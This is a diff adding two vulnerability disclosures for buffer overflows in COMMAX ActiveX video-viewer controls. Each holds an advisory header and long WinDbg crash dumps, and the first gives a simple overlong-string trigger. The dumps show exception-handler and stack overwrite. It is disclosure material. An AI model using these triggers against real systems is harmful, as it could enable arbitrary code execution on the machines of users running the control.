diff --git a/exploits/hardware/webapps/50231.txt b/exploits/hardware/webapps/50231.txt
new file mode 100644
index 000000000..90e50c4c7
--- /dev/null
+++ b/exploits/hardware/webapps/50231.txt
@@ -0,0 +1,332 @@
+# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: 2.1.4.5
+
+Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
+
+Desc: The vulnerability is caused due to a boundary error in the
+processing of user input, which can be exploited to cause a buffer
+overflow when a user inserts overly long array of string bytes
+through several functions. Successful exploitation could allow
+execution of arbitrary code on the affected node.
+
+Tested on: Microsoft Windows 10 Home (64bit) EN
+ Microsoft Internet Explorer 20H2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5663
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
+
+
+02.08.2021
+
+--
+
+
+$ python
+>>> "A"*1000 [ToTheClipboard]
+>>>#Paste in ID or anywhere
+
+(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
+wow64!Wow64pNotifyDebugger+0x19918:
+00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
+0:038> g
+(5220.5b30): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
+CNC_Ctrl!DllUnregisterServer+0xf5501:
+0b4d43bf f3aa rep stos byte ptr es:[edi]
+0:038:x86> r
+eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
+eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+CNC_Ctrl!DllUnregisterServer+0xf5501:
+0b4d43bf f3aa rep stos byte ptr es:[edi]
+0:038:x86> !exchain
+0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
+0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
+ CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
+ func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
+0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
+Invalid exception stack at ffffffff
+0:038:x86> kb
+ # ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
+01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
+02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
+03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
+0:038:x86> d esp
+0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~.
+0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
+0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
+0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
+0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
+0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
+0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
+0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
+0:038:x86> d ebp
+0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
+0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
+0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
+0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
+0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
+0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
+0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
+0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................
+0:038:x86> d esi
+41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
+0:038:x86> !analyze -v
+*******************************************************************************
+* *
+* Exception Analysis *
+* *
+*******************************************************************************
+
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll -
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX -
+GetUrlPageData2 (WinHttp) failed: 12002.
+
+DUMP_CLASS: 2
+
+DUMP_QUALIFIER: 0
+
+FAULTING_IP:
+CNC_Ctrl!DllUnregisterServer+f5501
+0b4d43bf f3aa rep stos byte ptr es:[edi]
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
+ ExceptionCode: c0000005 (Access violation)
+ ExceptionFlags: 00000000
+NumberParameters: 2
+ Parameter[0]: 00000001
+ Parameter[1]: 41414141
+Attempt to write to address 41414141
+
+FAULTING_THREAD: 00005b30
+
+DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
+
+PROCESS_NAME: IEXPLORE.EXE
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE_STR: c0000005
+
+EXCEPTION_PARAMETER1: 00000001
+
+EXCEPTION_PARAMETER2: 41414141
+
+FOLLOWUP_IP:
+CNC_Ctrl!DllUnregisterServer+f5501
+0b4d43bf f3aa rep stos byte ptr es:[edi]
+
+WRITE_ADDRESS: 41414141
+
+WATSON_BKT_PROCSTAMP: 95286d96
+
+WATSON_BKT_PROCVER: 11.0.19041.1
+
+PROCESS_VER_PRODUCT: Internet Explorer
+
+WATSON_BKT_MODULE: CNC_Ctrl.DLL
+
+WATSON_BKT_MODSTAMP: 547ed821
+
+WATSON_BKT_MODOFFSET: 1043bf
+
+WATSON_BKT_MODVER: 1.7.0.2
+
+MODULE_VER_PRODUCT: CNC_Ctrl Module
+
+BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
+
+MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e
+
+MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9
+
+NTGLOBALFLAG: 0
+
+PROCESS_BAM_CURRENT_THROTTLED: 0
+
+PROCESS_BAM_PREVIOUS_THROTTLED: 0
+
+APPLICATION_VERIFIER_FLAGS: 0
+
+PRODUCT_TYPE: 1
+
+SUITE_MASK: 784
+
+DUMP_TYPE: fe
+
+ANALYSIS_SESSION_HOST: LAB17
+
+ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116
+
+ANALYSIS_VERSION: 10.0.16299.91 amd64fre
+
+THREAD_ATTRIBUTES:
+OS_LOCALE: ENU
+
+PROBLEM_CLASSES:
+
+ ID: [0n301]
+ Type: [@ACCESS_VIOLATION]
+ Class: Addendum
+ Scope: BUCKET_ID
+ Name: Omit
+ Data: Omit
+ PID: [Unspecified]
+ TID: [0x5b30]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+ ID: [0n274]
+ Type: [INVALID_POINTER_WRITE]
+ Class: Primary
+ Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
+ BUCKET_ID
+ Name: Add
+ Data: Omit
+ PID: [Unspecified]
+ TID: [0x5b30]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+ ID: [0n152]
+ Type: [ZEROED_STACK]
+ Class: Addendum
+ Scope: BUCKET_ID
+ Name: Add
+ Data: Omit
+ PID: [0x5220]
+ TID: [0x5b30]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
+
+PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
+
+LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf
+
+STACK_TEXT:
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
+0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
+0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
+0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
+
+
+THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546
+
+THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5
+
+FAULT_INSTR_CODE: 458baaf3
+
+SYMBOL_STACK_INDEX: 0
+
+SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501
+
+FOLLOWUP_NAME: MachineOwner
+
+MODULE_NAME: CNC_Ctrl
+
+IMAGE_NAME: CNC_Ctrl.DLL
+
+DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
+
+STACK_COMMAND: ~38s ; .cxr ; kb
+
+FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
+
+BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
+
+FAILURE_EXCEPTION_CODE: c0000005
+
+FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
+
+BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
+
+FAILURE_MODULE_NAME: CNC_Ctrl
+
+BUCKET_ID_MODULE_STR: CNC_Ctrl
+
+FAILURE_FUNCTION_NAME: DllUnregisterServer
+
+BUCKET_ID_FUNCTION_STR: DllUnregisterServer
+
+BUCKET_ID_OFFSET: f5501
+
+BUCKET_ID_MODTIMEDATESTAMP: 547ed821
+
+BUCKET_ID_MODCHECKSUM: 357a4b
+
+BUCKET_ID_MODVER_STR: 1.7.0.2
+
+BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
+
+FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
+
+FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
+
+WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
+
+TARGET_TIME: 2021-08-12T12:21:50.000Z
+
+OSBUILD: 19042
+
+OSSERVICEPACK: 1023
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+OSPLATFORM_TYPE: x64
+
+OSNAME: Windows 10
+
+OSEDITION: Windows 10 WinNt SingleUserTS Personal
+
+USER_LCID: 0
+
+OSBUILD_TIMESTAMP: unknown_date
+
+BUILDDATESTAMP_STR: 160101.0800
+
+BUILDLAB_STR: WinBuild
+
+BUILDOSVER_STR: 10.0.19041.1023
+
+ANALYSIS_SESSION_ELAPSED_TIME: 1d869
+
+ANALYSIS_SOURCE: UM
+
+FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
+
+FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
+
+Followup: MachineOwner
+---------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50232.txt b/exploits/hardware/webapps/50232.txt
new file mode 100644
index 000000000..de6ee4b5a
--- /dev/null
+++ b/exploits/hardware/webapps/50232.txt
@@ -0,0 +1,551 @@
+# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: 1.7.0.2
+
+Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
+DVR/NVR.
+
+Desc: The vulnerability is caused due to a boundary error in the
+processing of user input, which can be exploited to cause a heap
+based buffer overflow when a user inserts overly long array of
+string bytes through several functions. Successful exploitation
+could allow execution of arbitrary code on the affected node.
+
+Tested on: Microsoft Windows 10 Home (64bit) EN
+ Microsoft Internet Explorer 20H2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5664
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php
+
+
+02.08.2021
+
+--
+
+
+
+
+
+
+
+
+
+==
+
+(5b1c.59e8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
+CNC_Ctrl!DllUnregisterServer+0x19e34:
+10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
+0:000:x86> r
+eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
+eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+CNC_Ctrl!DllUnregisterServer+0x19e34:
+10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
+0:000:x86> !exchain
+030feab4: 41414141
+Invalid exception stack at 41414141
+0:000:x86> d esp
+030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+0:000:x86> d ebp
+030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+0:000:x86> !analyze -v
+*******************************************************************************
+* *
+* Exception Analysis *
+* *
+*******************************************************************************
+
+GetUrlPageData2 (WinHttp) failed: 12002.
+
+DUMP_CLASS: 2
+
+DUMP_QUALIFIER: 0
+
+FAULTING_IP:
+CNC_Ctrl!DllUnregisterServer+18ee3
+10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
+ ExceptionCode: c0000005 (Access violation)
+ ExceptionFlags: 00000000
+NumberParameters: 2
+ Parameter[0]: 00000001
+ Parameter[1]: 000012d4
+Attempt to write to address 000012d4
+
+FAULTING_THREAD: 000056a4
+
+DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
+
+PROCESS_NAME: wscript.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE_STR: c0000005
+
+EXCEPTION_PARAMETER1: 00000001
+
+EXCEPTION_PARAMETER2: 000012d4
+
+FOLLOWUP_IP:
+CNC_Ctrl!DllUnregisterServer+18ee3
+10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
+
+WRITE_ADDRESS: 000012d4
+
+WATSON_BKT_PROCSTAMP: 7159f3df
+
+WATSON_BKT_PROCVER: 5.812.10240.16384
+
+PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host
+
+WATSON_BKT_MODULE: CNC_Ctrl.DLL
+
+WATSON_BKT_MODSTAMP: 547ed821
+
+WATSON_BKT_MODOFFSET: 27da1
+
+WATSON_BKT_MODVER: 1.7.0.2
+
+MODULE_VER_PRODUCT: CNC_Ctrl Module
+
+BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
+
+MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e
+
+MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1
+
+NTGLOBALFLAG: 0
+
+PROCESS_BAM_CURRENT_THROTTLED: 0
+
+PROCESS_BAM_PREVIOUS_THROTTLED: 0
+
+APPLICATION_VERIFIER_FLAGS: 0
+
+PRODUCT_TYPE: 1
+
+SUITE_MASK: 784
+
+DUMP_TYPE: fe
+
+ANALYSIS_SESSION_HOST: LAB17
+
+ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907
+
+ANALYSIS_VERSION: 10.0.16299.91 amd64fre
+
+THREAD_ATTRIBUTES:
+OS_LOCALE: ENU
+
+PROBLEM_CLASSES:
+
+ ID: [0n301]
+ Type: [@ACCESS_VIOLATION]
+ Class: Addendum
+ Scope: BUCKET_ID
+ Name: Omit
+ Data: Omit
+ PID: [Unspecified]
+ TID: [0x56a4]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+ ID: [0n274]
+ Type: [INVALID_POINTER_WRITE]
+ Class: Primary
+ Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
+ BUCKET_ID
+ Name: Add
+ Data: Omit
+ PID: [Unspecified]
+ TID: [0x56a4]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+ ID: [0n152]
+ Type: [ZEROED_STACK]
+ Class: Addendum
+ Scope: BUCKET_ID
+ Name: Add
+ Data: Omit
+ PID: [0x56e4]
+ TID: [0x56a4]
+ Frame: [0] : CNC_Ctrl!DllUnregisterServer
+
+BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
+
+PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
+
+IP_ON_HEAP: 61616161
+The fault address in not in any loaded module, please check your build's rebase
+log at \bin\build_logs\timebuild\ntrebase.log for module which may
+contain the address if it were loaded.
+
+IP_IN_FREE_BLOCK: 61616161
+
+FRAME_ONE_INVALID: 1
+
+LAST_CONTROL_TRANSFER: from 61616161 to 10027da1
+
+STACK_TEXT:
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
+00afe298 61616161 61616161 61616161 61616161 0x61616161
+00afe29c 61616161 61616161 61616161 61616161 0x61616161
+00afe2a0 61616161 61616161 61616161 61616161 0x61616161
+00afe2a4 61616161 61616161 61616161 61616161 0x61616161
+00afe2a8 61616161 61616161 61616161 61616161 0x61616161
+00afe2ac 61616161 61616161 61616161 61616161 0x61616161
+00afe2b0 61616161 61616161 61616161 61616161 0x61616161
+00afe2b4 61616161 61616161 61616161 61616161 0x61616161
+00afe2b8 61616161 61616161 61616161 61616161 0x61616161
+00afe2bc 61616161 61616161 61616161 61616161 0x61616161
+00afe2c0 61616161 61616161 61616161 61616161 0x61616161
+00afe2c4 61616161 61616161 61616161 61616161 0x61616161
+00afe2c8 61616161 61616161 61616161 61616161 0x61616161
+00afe2cc 61616161 61616161 61616161 61616161 0x61616161
+00afe2d0 61616161 61616161 61616161 61616161 0x61616161
+00afe2d4 61616161 61616161 61616161 61616161 0x61616161
+00afe2d8 61616161 61616161 61616161 61616161 0x61616161
+00afe2dc 61616161 61616161 61616161 61616161 0x61616161
+00afe2e0 61616161 61616161 61616161 61616161 0x61616161
+00afe2e4 61616161 61616161 61616161 61616161 0x61616161
+00afe2e8 61616161 61616161 61616161 61616161 0x61616161
+00afe2ec 61616161 61616161 61616161 61616161 0x61616161
+00afe2f0 61616161 61616161 61616161 61616161 0x61616161
+00afe2f4 61616161 61616161 61616161 61616161 0x61616161
+00afe2f8 61616161 61616161 61616161 61616161 0x61616161
+00afe2fc 61616161 61616161 61616161 61616161 0x61616161
+00afe300 61616161 61616161 61616161 61616161 0x61616161
+00afe304 61616161 61616161 61616161 61616161 0x61616161
+00afe308 61616161 61616161 61616161 61616161 0x61616161
+00afe30c 61616161 61616161 61616161 61616161 0x61616161
+00afe310 61616161 61616161 61616161 61616161 0x61616161
+00afe314 61616161 61616161 61616161 61616161 0x61616161
+00afe318 61616161 61616161 61616161 41414141 0x61616161
+00afe31c 61616161 61616161 41414141 41414141 0x61616161
+00afe320 61616161 41414141 41414141 41414141 0x61616161
+00afe324 41414141 41414141 41414141 41414141 0x61616161
+00afe328 41414141 41414141 41414141 41414141 0x41414141
+00afe32c 41414141 41414141 41414141 41414141 0x41414141
+00afe330 41414141 41414141 41414141 41414141 0x41414141
+00afe334 41414141 41414141 41414141 41414141 0x41414141
+00afe338 41414141 41414141 41414141 41414141 0x41414141
+00afe33c 41414141 41414141 41414141 41414141 0x41414141
+00afe340 41414141 41414141 41414141 41414141 0x41414141
+00afe344 41414141 41414141 41414141 41414141 0x41414141
+00afe348 41414141 41414141 41414141 41414141 0x41414141
+00afe34c 41414141 41414141 41414141 41414141 0x41414141
+00afe350 41414141 41414141 41414141 41414141 0x41414141
+00afe354 41414141 41414141 41414141 41414141 0x41414141
+00afe358 41414141 41414141 41414141 41414141 0x41414141
+00afe35c 41414141 41414141 41414141 41414141 0x41414141
+00afe360 41414141 41414141 41414141 41414141 0x41414141
+00afe364 41414141 41414141 41414141 41414141 0x41414141
+00afe368 41414141 41414141 41414141 41414141 0x41414141
+00afe36c 41414141 41414141 41414141 41414141 0x41414141
+00afe370 41414141 41414141 41414141 41414141 0x41414141
+00afe374 41414141 41414141 41414141 41414141 0x41414141
+00afe378 41414141 41414141 41414141 41414141 0x41414141
+00afe37c 41414141 41414141 41414141 41414141 0x41414141
+00afe380 41414141 41414141 41414141 41414141 0x41414141
+00afe384 41414141 41414141 41414141 41414141 0x41414141
+00afe388 41414141 41414141 41414141 41414141 0x41414141
+00afe38c 41414141 41414141 41414141 41414141 0x41414141
+00afe390 41414141 41414141 41414141 41414141 0x41414141
+00afe394 41414141 41414141 41414141 41414141 0x41414141
+00afe398 41414141 41414141 41414141 41414141 0x41414141
+00afe39c 41414141 41414141 41414141 41414141 0x41414141
+00afe3a0 41414141 41414141 41414141 41414141 0x41414141
+00afe3a4 41414141 41414141 41414141 41414141 0x41414141
+00afe3a8 41414141 41414141 41414141 41414141 0x41414141
+00afe3ac 41414141 41414141 41414141 41414141 0x41414141
+00afe3b0 41414141 41414141 41414141 41414141 0x41414141
+00afe3b4 41414141 41414141 41414141 41414141 0x41414141
+00afe3b8 41414141 41414141 41414141 41414141 0x41414141
+00afe3bc 41414141 41414141 41414141 41414141 0x41414141
+00afe3c0 41414141 41414141 41414141 41414141 0x41414141
+00afe3c4 41414141 41414141 41414141 41414141 0x41414141
+00afe3c8 41414141 41414141 41414141 41414141 0x41414141
+00afe3cc 41414141 41414141 41414141 41414141 0x41414141
+00afe3d0 41414141 41414141 41414141 41414141 0x41414141
+00afe3d4 41414141 41414141 41414141 41414141 0x41414141
+00afe3d8 41414141 41414141 41414141 41414141 0x41414141
+00afe3dc 41414141 41414141 41414141 41414141 0x41414141
+00afe3e0 41414141 41414141 41414141 41414141 0x41414141
+00afe3e4 41414141 41414141 41414141 41414141 0x41414141
+00afe3e8 41414141 41414141 41414141 41414141 0x41414141
+00afe3ec 41414141 41414141 41414141 41414141 0x41414141
+00afe3f0 41414141 41414141 41414141 41414141 0x41414141
+00afe3f4 41414141 41414141 41414141 41414141 0x41414141
+00afe3f8 41414141 41414141 41414141 41414141 0x41414141
+00afe3fc 41414141 41414141 41414141 41414141 0x41414141
+00afe400 41414141 41414141 41414141 41414141 0x41414141
+00afe404 41414141 41414141 41414141 41414141 0x41414141
+00afe408 41414141 41414141 41414141 41414141 0x41414141
+00afe40c 41414141 41414141 41414141 41414141 0x41414141
+00afe410 41414141 41414141 41414141 41414141 0x41414141
+00afe414 41414141 41414141 41414141 41414141 0x41414141
+00afe418 41414141 41414141 41414141 41414141 0x41414141
+00afe41c 41414141 41414141 41414141 41414141 0x41414141
+00afe420 41414141 41414141 41414141 41414141 0x41414141
+00afe424 41414141 41414141 41414141 41414141 0x41414141
+00afe428 41414141 41414141 41414141 41414141 0x41414141
+00afe42c 41414141 41414141 41414141 41414141 0x41414141
+00afe430 41414141 41414141 41414141 41414141 0x41414141
+00afe434 41414141 41414141 41414141 41414141 0x41414141
+00afe438 41414141 41414141 41414141 41414141 0x41414141
+00afe43c 41414141 41414141 41414141 41414141 0x41414141
+00afe440 41414141 41414141 41414141 41414141 0x41414141
+00afe444 41414141 41414141 41414141 41414141 0x41414141
+00afe448 41414141 41414141 41414141 41414141 0x41414141
+00afe44c 41414141 41414141 41414141 41414141 0x41414141
+00afe450 41414141 41414141 41414141 41414141 0x41414141
+00afe454 41414141 41414141 41414141 41414141 0x41414141
+00afe458 41414141 41414141 41414141 41414141 0x41414141
+00afe45c 41414141 41414141 41414141 41414141 0x41414141
+00afe460 41414141 41414141 41414141 41414141 0x41414141
+00afe464 41414141 41414141 41414141 41414141 0x41414141
+00afe468 41414141 41414141 41414141 41414141 0x41414141
+00afe46c 41414141 41414141 41414141 41414141 0x41414141
+00afe470 41414141 41414141 41414141 41414141 0x41414141
+00afe474 41414141 41414141 41414141 41414141 0x41414141
+00afe478 41414141 41414141 41414141 41414141 0x41414141
+00afe47c 41414141 41414141 41414141 41414141 0x41414141
+00afe480 41414141 41414141 41414141 41414141 0x41414141
+00afe484 41414141 41414141 41414141 41414141 0x41414141
+00afe488 41414141 41414141 41414141 41414141 0x41414141
+00afe48c 41414141 41414141 41414141 41414141 0x41414141
+00afe490 41414141 41414141 41414141 41414141 0x41414141
+00afe494 41414141 41414141 41414141 41414141 0x41414141
+00afe498 41414141 41414141 41414141 41414141 0x41414141
+00afe49c 41414141 41414141 41414141 41414141 0x41414141
+00afe4a0 41414141 41414141 41414141 41414141 0x41414141
+00afe4a4 41414141 41414141 41414141 41414141 0x41414141
+00afe4a8 41414141 41414141 41414141 41414141 0x41414141
+00afe4ac 41414141 41414141 41414141 41414141 0x41414141
+00afe4b0 41414141 41414141 41414141 41414141 0x41414141
+00afe4b4 41414141 41414141 41414141 41414141 0x41414141
